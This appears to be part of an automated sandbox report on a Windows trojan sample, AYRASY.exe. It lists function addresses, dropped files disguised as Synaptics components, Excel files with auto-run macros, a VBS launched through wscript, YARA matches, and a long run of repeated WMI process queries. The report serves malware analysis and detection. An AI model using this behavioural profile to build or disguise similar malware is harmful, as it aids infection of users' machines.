                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001766702_2_00176670
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001906772_2_00190677
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DA8DC2_2_001DA8DC
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00190A8F2_2_00190A8F
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00176BBC2_2_00176BBC
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0019AC832_2_0019AC83
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018AD5C2_2_0018AD5C
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001A4EBF2_2_001A4EBF
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00190EC42_2_00190EC4
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001A113E2_2_001A113E
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001912F92_2_001912F9
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001A542F2_2_001A542F
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001DF5D02_2_001DF5D0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001A599F2_2_001A599F
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00175D322_2_00175D32
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0017BDF02_2_0017BDF0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0019BDF62_2_0019BDF6
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00191E5A2_2_00191E5A
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0019DF692_2_0019DF69
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BBFB82_2_001BBFB8
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001A7FFD2_2_001A7FFD
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009BDCD09_2_009BDCD0
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009BA0C09_2_009BA0C0
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009D01839_2_009D0183
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009F220C9_2_009F220C
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009B85309_2_009B8530
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009D06779_2_009D0677
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009B66709_2_009B6670
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1A8DC9_2_00A1A8DC
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009D0A8F9_2_009D0A8F
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009B6BBC9_2_009B6BBC
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009DAC839_2_009DAC83
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009CAD5C9_2_009CAD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009E4EBF9_2_009E4EBF
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009D0EC49_2_009D0EC4
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A130AD9_2_00A130AD
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009E113E9_2_009E113E
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009D12F99_2_009D12F9
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009E542F9_2_009E542F
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A1F5D09_2_00A1F5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009C36809_2_009C3680
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009E599F9_2_009E599F
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009DBDF69_2_009DBDF6
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009BBDF09_2_009BBDF0
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009B5D329_2_009B5D32
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009D1E5A9_2_009D1E5A
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009FBFB89_2_009FBFB8
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009E7FFD9_2_009E7FFD
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009DDF699_2_009DDF69
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: eLc9RiO7.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: PWCCAWLGRE.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: String function: 009CF885 appears 68 times
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: String function: 009D7750 appears 42 times
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: String function: 00197750 appears 42 times
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: String function: 0018F885 appears 68 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 3548
                                Source: AYRASY.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: AYRASY.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCX4413.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: AYRASY.exe, 00000000.00000003.2148294542.0000000000886000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNamecent vs AYRASY.exe
                                Source: AYRASY.exe, 00000000.00000003.2148294542.0000000000886000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs AYRASY.exe
                                Source: AYRASY.exe, 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs AYRASY.exe
                                Source: AYRASY.exe, 00000000.00000000.2139728714.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs AYRASY.exe
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs AYRASY.exe
                                Source: AYRASY.exeBinary or memory string: OriginalFileName vs AYRASY.exe
                                Source: AYRASY.exeBinary or memory string: OriginalFilenameb! vs AYRASY.exe
                                Source: AYRASY.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@21/28@5/4
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BD712 GetLastError,FormatMessageW,2_2_001BD712
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001AB8B0 AdjustTokenPrivileges,CloseHandle,2_2_001AB8B0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001ABEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_001ABEC3
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009EB8B0 AdjustTokenPrivileges,CloseHandle,9_2_009EB8B0
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009EBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_009EBEC3
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_001BEA85
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_001B6F5B
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BEFCD CoInitialize,CoCreateInstance,CoUninitialize,2_2_001BEFCD
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001731F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_001731F2
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile created: C:\Users\user\Desktop\._cache_AYRASY.exeJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3556:120:WilError_03
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5048
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeFile created: C:\Users\user\AppData\Local\Temp\WBHUSK.vbsJump to behavior
                                Source: Yara matchFile source: AYRASY.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.AYRASY.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4413.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs
                                Source: C:\Users\user\Desktop\AYRASY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
